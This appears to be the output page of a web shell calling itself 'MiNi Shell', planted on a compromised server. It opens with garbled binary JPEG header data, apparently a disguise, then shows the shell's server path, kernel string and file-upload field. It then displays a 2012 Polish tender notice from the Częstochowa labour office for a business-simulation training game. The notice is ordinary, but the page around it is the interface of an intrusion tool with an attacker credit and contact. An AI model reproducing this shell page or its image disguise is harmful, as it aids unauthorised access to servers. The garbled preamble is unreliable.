JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120524/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120524/169820-N-2012.html

<p class="kh_header"><b>Częstochowa: Przetarg nieograniczony na przeprowadzenie symulacyjnej gry decyzyjnej dla osób bezrobotnych zarejestrowancyh w Powiatowym Urzędzie Pracy w Częstochowie.</b><br>
<b>Numer ogłoszenia: 169820 - 2012; data zamieszczenia: 24.05.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiatowy Urząd Pracy w Częstochowie , ul. Szymanowskiego 15, 42-200 Częstochowa, woj. śląskie, tel. 034 3706100 w. 186, faks 034 3243130.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przetarg nieograniczony na przeprowadzenie symulacyjnej gry decyzyjnej dla osób bezrobotnych zarejestrowancyh w Powiatowym Urzędzie Pracy w Częstochowie..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem    zamówienia    jest   przeprowadzenie  zajęć z zakresu symulacyjnej gry decyzyjnej  dla   50 osób bezrobotnych   zarejestrowanych w Powiatowym Urzędzie Pracy
w Częstochowie.
UWAGA:     PLANOWANE   TERMINY    REALIZACJI    MOGĄ      ULEC     ZMIANIE,    Z    ZASTRZEŻENIEM,   IŻ    REALIZACJA ZAMÓWIENIA    MUSI     ZAKOŃCZYĆ   SIĘ  MAKSYMALNIE  DO   30.08.2012 R. 

Symulacyjna gra decyzyjna
Kod CPV - 37524100-8 - gry edukacyjne.

Przewidziano do przeszkolenia 50 osób  (szkolenie byłoby finansowane z 10 % odpisu Funduszu Pracy  2012 na finansowanie programów specjalnych). 


1.1  Liczba osób i czas trwania gry

Zamawiający planuje przeszkolić osoby w trzech następujących grupach:
-	I i II  grupa -   termin  rozpoczęcia  gry czerwiec-lipiec 2012 r.  - 33 osoby
-	III -  termin  rozpoczęcia  gry sierpień 2012 r. - 17 osób  

Ostatnia grupa może zakończyć grę maksymalnie do 31.08.2012 r.

1.2  Miejsce prowadzenia gry

Gry muszą odbywać się na terenie Częstochowy. Jest to podyktowane faktem, iż osobom bezrobotnym  zamieszkałym poza miastem najłatwiej dojechać na zajęcia do Częstochowy.
Wykonawca   musi  wskazać  dokładny  adres  miejsca  przeprowadzania  zajęć.
Sale dydaktyczne muszą posiadać dostęp do szatni (przebieralni) oraz dostęp do sanitariatów wyposażonych w bieżącą wodę (ciepłą i zimną).  
Wymagane  jest  aby   powierzchnia   sal  dydaktycznych,  ilość  stanowisk  oraz  wyposażenie 
w sprzęt i pomoce dydaktyczne były dostosowane  do prowadzonych zajęć oraz liczby uczestników, zgodnie z  przepisami dotyczącymi  bezpieczeństwa i higieny pracy.  
Z jednej grupy wyodrębnia się 4 zespoły (zarząd mikrofirm). Każda mikrofirma ma do działąnia odrębne pomieszczenie, zapewniające jej tajemnicę podejmowanych decyzji.
Dopuszcza się możliwość przeprowadzenia gry (dla całej grupy (liczącej 16-17 osób) 
w jednym pomieszczeniu, o powierzchni min. 60 m2. Jednak warunkiem koniecznym jest zapewnienie odrębności każdej mikrofirmie Każda grupa (mikrofirma - ok. 4-5 osób) powinna mieć do dyspozycji przestawne stoły i krzesła (wyklucza się układ kinowy  lub stoły na sztywno przyśrubowane.
Na sali powinien znajdować się flipczart oraz ekran.
Do przeprowadzenia gry w każdej grupie wymaganych jest co  najmniej dwóch trenerów, gwarantujących właściwy przebieg gry.

1.3  Organizacja i przebieg gry

Gra winna trwać 50 godzin dydaktycznych (godzina dydaktyczna = 45 minut).
Zajęcia muszą odbywać się w dni robocze (od poniedziałku do piątku) w kolejno następujących po sobie dniach, w wymiarze nie więcej niż 8 godzin dziennie.


1.4  Charakterystyka gry

1.	Realizowane cele dydaktyczne: dostarczenie wiedzy, umiejętności oraz kształtowanie postaw przedsiębiorczych. Adresatem gry byłyby osoby bezrobotne, zarejestrowane
 w Powiatowym Urzędzie Pracy w Częstochowie, znajdujące się w szczególnej sytuacji na rynku pracy (art. 49 ustawy z dnia 20 kwietnia 2004 r. o promocji zatrudnienia i instytucjach rynku pracy) tj. należące do jednej z n/w grup;
- bezrobotni do 25 roku życia,
- bezrobotni długotrwale,
- po zakończeniu realizacji kontraktu socjalnego,
- kobiety, które po urodzeniu dziecka nie podjęły zatrudnienia,
- bezrobotni powyżej 50 roku życia,
- bezrobotni bez kwalifikacji zawodowych,
- bezrobotni bez doświadczenia zawodowego,
- bezrobotni bez wykształcenia średniego,
- bezrobotni samotnie wychowujący co najmniej jedno dziecko do 18 roku życia,
- bezrobotni, którzy po karze pozbawienia wolności nie podjęli zatrudnienia,
- bezrobotni niepełnosprawni.
2. Funkcje gry: gra informacyjna oraz kontrolno - oceniająca.
3. Rodzaj kształconych umiejętności: rozwijająca umiejętności podejmowania decyzji racjonalnych rzeczowo i metodologicznie.
4. Przedmiot gry: organizacja, ekonomia i zarządzanie małym przedsiębiorstwem. Przedmiotem gry będzie prowadzenie małej firmy usługowej lub produkcyjnej w okresie
od 1 do 5 lat (ze szczególnym uwzględnieniem kompetencji sprzedażowych).
5. Stopień uogólnienia: gra globalno - funkcjonalna, obejmująca całość zarządzania mikroprzedsiębiorstwem, z rozwinięciem konkurencji i marketingu.
6. Gra problemowa z ukrytymi i sformułowanymi problemami. Gra powinna zawierać problemy wynikające z metodyki Zarządzania małą firmą. Pojawiające się zdarzenia związane z zagrożeniem i szansami będą losowo modyfikować sytuację, zmuszając uczestników gry do reakcji na nie.
7.  Gra naturalno - symulacyjna obejmująca problemy z rzeczywistości gospodarczej przedstawione na modelu małego przedsiębiorstwa usługowego lub produkcyjnego działającego na obszarze jednego województwa (maksymalnie na obszarze Polski).
8. Gra stochastyczna: probabilistyczno - strategiczna.
9. Gra oparta na modelach: matematycznym i werbalno opisowym.
10. Gra wieloetapowa: od 16 serii decyzji.
11. Technika obliczeniowa: gra ręczna, ołówkowa, z możliwością przenoszenia wyliczonych ręcznie danych na komputer. Grę cechuje minimalna ilość materiałów dydaktycznych, która sprowadza się do: notatnika, przyborów piśmiennych i kalkulatora, ewentualnie drobnych pomocy dydaktycznych typu: żetony. Wykonawca zapewni uczestnikom gry niezbędne materiały dydaktyczne, materiały piśmiennicze.
12. Przebieg gry:
     Zgodnie z metodyką realizacji zajęć metodą symulacyjną gier decyzyjnych, gra winna dzielić się na następujące etapy:
- wprowadzenie - mające na celu rozpoznanie poziomu przygotowania uczestników do gry
i dobór jej stopnia trudności, przekazanie podstawowej wiedzy i umiejętności, gwarantujący poziom świadomego udziału w treningu decyzyjnym i przygotowanie do działania w klimacie ostrej konkurencji oraz presji czasu,
- rozegranie gry (od 50 do 75% czasu gry) - uczestnicy poznają prawa rynku, związki
i zależności oddziaływujące na przedsiębiorstwo w gospodarce rynkowej, rolę zysku oraz zapewnienia płynności finansowej jako podstawę bytu i rozwoju firmy. Uczestnicy praktycznie przećwiczą metody podejmowania decyzji, poznają podstawy rynku ekonomicznego, rachunku zysków i strat, kalkulacji kosztów, przepływów finansowych oraz analizy finansowej, nabędą umiejętność pracy zespołowej oraz organizacji zespołów zadaniowych,
- ocena - podsumowanie wyników gry (5 godzin dydaktycznych) - najważniejsza część,
to etap oceny wyników ekonomicznych, podjętych decyzji, które pozwolą na samoocenę uczestnika gry.
   Etap związany z wprowadzeniem i wyjaśnieniem zagadnień może przebiegać równolegle
z grą, tak aby pewne zagadnienia były wyjaśniane na bieżąco, w trakcie gry.


1.5  Materiały szkoleniowe dla uczestników, poczęstunek

Każdy uczestnik kursu musi otrzymać następujące materiały szkoleniowe: minimum jeden podręcznik oraz materiały  informacyjne   związane  z   tematyką  prowadzonych zajęć  (broszury),  zeszyt  A4  w twardej oprawie, długopis, ołówek, zakreślacz itp. przybory piśmienne.
Powyższe  materiały    każdy  uczestnik  kursu  musi otrzymać  w teczce tekturowej z rączką. 
Ponadto wymagane jest aby każdy uczestnik kursu otrzymał wszystkie materiały oraz prezentacje użyte na zajęciach zapisane w wersji elektronicznej na pendrive o pojemności minimum 4GB.
Materiały, które uczestnicy otrzymują na własność winny być nowe - nieużywane. Wykonawca winien posiadać dokumenty potwierdzające dokonanie zakupu materiałów (faktury, rachunki) - do wglądu Zamawiającego.
Komplet materiałów winien zostać przekazany uczestnikom w pierwszym dniu zajęć.
Wszyscy uczestnicy gry muszą otrzymać każdego dnia  poczęstunek w postaci słodkiej bułki (w czasie przerwy kawowej) oraz ciepłego posiłku (drugiego dania) w połowie dnia szkoleniowego. 
Zestaw obiadowy musi obejmować: 
	sztuka mięsa (przemiennie) lub ryba - minimum 150g, 
	ziemniaki lub zamiennie makaron, kasza, ryż - minimum 300g, 
	surówka - minimum 150 g,  
	kompot - minimum 0,25l.
Ciepłe posiłki muszą być zróżnicowane i nie mogą powtarzać się częściej niż raz na 5 dni szkoleniowych.
Sposób podania ciepłego posiłku (drugiego dania):
	w sytuacji dowozu posiłków do sali szkoleniowej - każdy uczestnik kursu musi mieć zapewnione miejsce siedzące, drugie danie musi być podane na ciepło w pojemniku termoizolacyjnym z kompletem sztućców jednorazowych i serwetek.
	w sytuacji spożywania posiłków w restauracji, stołówce itp. - każdy uczestnik kursu musi mieć zapewnione miejsce siedzące, posiłki muszą być serwowane na ciepło, podane na zastawie obiadowej ze sztućcami i serwetkami. Miejsce posiłku nie może być oddalone więcej niż 5 minut drogi pieszo od miejsca przeprowadzania szkolenia.

W czasie przerw kawowych należy zapewnić każdemu uczestnikowi kursu:
	kawę - minimum 2 filiżanki na osobę,
	herbatę - minimum 2 filiżanki na osobę,
	wodę mineralną gazowaną, niegazowaną - minimum 2 butelki, każda po 0,50l na osobę.

Wykonawca musi zapewnić uczestnikom kursu higieniczne miejsce do spożywania poczęstunku. W sali lub jej bliskim sąsiedztwie musi znajdować się dodatkowy stolik, czajnik (termos)  oraz  miejsce  zapewniające  możliwość  przechowywania   produktów  spożywczych 
i naczyń jednorazowych dla uczestników kursu bez dostępu dla osób trzecich.

1.6  Ubezpieczenie od następstw nieszczęśliwych wypadków

Wykonawca zobowiązuje się do ubezpieczenia od następstw nieszczęśliwych wypadków wszystkich uczestników gry. Koszt tego ubezpieczenia należy wliczyć w koszt gry.


1.7  Program, ankiety, rekomendacje.

Do oferty należy przedłożyć program prowadzonej gry  (załącznik do SIWZ). 
Po zakończonych zajęciach wymagane jest przedłożenie ankiet wypełnionych przez uczestników (wzór - załącznik do umowy).
Po zakończonej grze Wykonawca wyda uczestnikom rekomendacje (wzór - załącznik do umowy)..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Przedmiotem ewentualnych zamówień uzupełniajacych byłaby usługa - przeprowadzenie symulacyjnej gry decyzyjnej o wartości do 50% wartości zamówienia podstawowego, zgodnie z art. 67 ust. 1 pkt 7 PZP.</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 37.52.41.00-8.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.08.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje tego warunku.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna ten warunek za spełniony, jeśli Wykonawca wykaże, iż w okresie trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy, to w tym okresie, zaprojektował co najmniej jedną symulacyjną grę decyzyjną oraz przeprowadził co najmniej dwie symulacyjne gry decyzyjne z zakresu przedsiębiorczości, zarządzania własną firmą dla grupy minimum 16 osobowej oraz, że usługi te zostały wykonane należycie.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje tego warunku.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna ten warunek za spełniony, jeżeli Wykonawca wykaże, iż dysponuje minimum dwoma trenerami do realizacji niniejszego zamówienia spełniającymi poniższe wymagania:
- wykształcenie wyższe ekonomiczne (magisterskie lub podyplomowe),
- doświadczenie w prowadzeniu własnej działalności gospodarczej,
- doświadczenie w postaci minimum dwóch przeprowadzonych symulacyjnych gier decyzyjnych z zakresu przedsiębiorczości, zarządzania własną firmą dla grupy minimum 16 osobowej.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje tego warunku.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">Program gry</p></li>



</ul><p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Oryginalne pełnomocnictwo (ewentualnie poświadczone notarialnie) potwierdzające uprawnienie osób podpisujących ofertę, jeżeli uprawnienie takie nie wynika wprost z doku-mentu stwierdzającego status prawny Wykonawcy lub z przepisów prawa.
Oświadczenie o spełnianiu przez Wykonawcę warunków określonych w art. 22 ust 1 i o niepodleganiu wykluczeniu z art. 24 ustawy Prawo zamówień publicznych stanowiące załącznik nr 3a i 3b do SIWZ.
Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postę-powaniu na potencjał innych podmiotów (na podstawie art. 26 ust. 2b Prawa zamówień publicznych) jest zobowiązany udowodnić Zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedkłada pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów no okres korzystania
z nich przy wykonywaniu zamówienia.
Wykaz części zamówienia przekazanych do realizacji przez podwykonawców stanowiący załącznik nr 8 do SIWZ. Jeśli Wykonawca nie będzie przekazywał do realizacji przez podwykonawców żadnej części zamówienia należy również złożyć załącznik nr 8, w odpowiednie pola wpisując Nie dotyczy.
Wykonawca wyłoniony w drodze postępowania na realizację zamówienia składa najpóźniej w dniu podpisania umowy: 

a) w przypadku udzielenia zamówienia konsorcjum (tzn. wykonawcy określonemu
w art. 23 ust. 1 Prawa zamówień publicznych), Zamawiający przed podpisaniem umowy zażąda złożenia umowy regulującej współpracę tych Wykonawców

b) wykonawca wyłoniony w drodze postępowania na realizację zamówienia, będący osobą fizyczną prowadzącą działalność gospodarczą,  składa najpóźniej w dniu podpisania umowy aktualne  (tj. zawierające aktualne informacje) zaświadczenie o wpisie do ewidencji  działalności gospodarczej.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://pup.bip.czestochowa.pl/bip/<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Powiatowy Urząd Pracy w Częstochowie, pok. 209, ul. K. Szymanowskiego 15, 42-217 Częstochowa..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 11.06.2012 godzina 08:30, miejsce: Powiatowy Urząd Pracy w Częstochowie, pok. 114, ul. K. Szymanowskiego 15, 42-217 Częstochowa..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com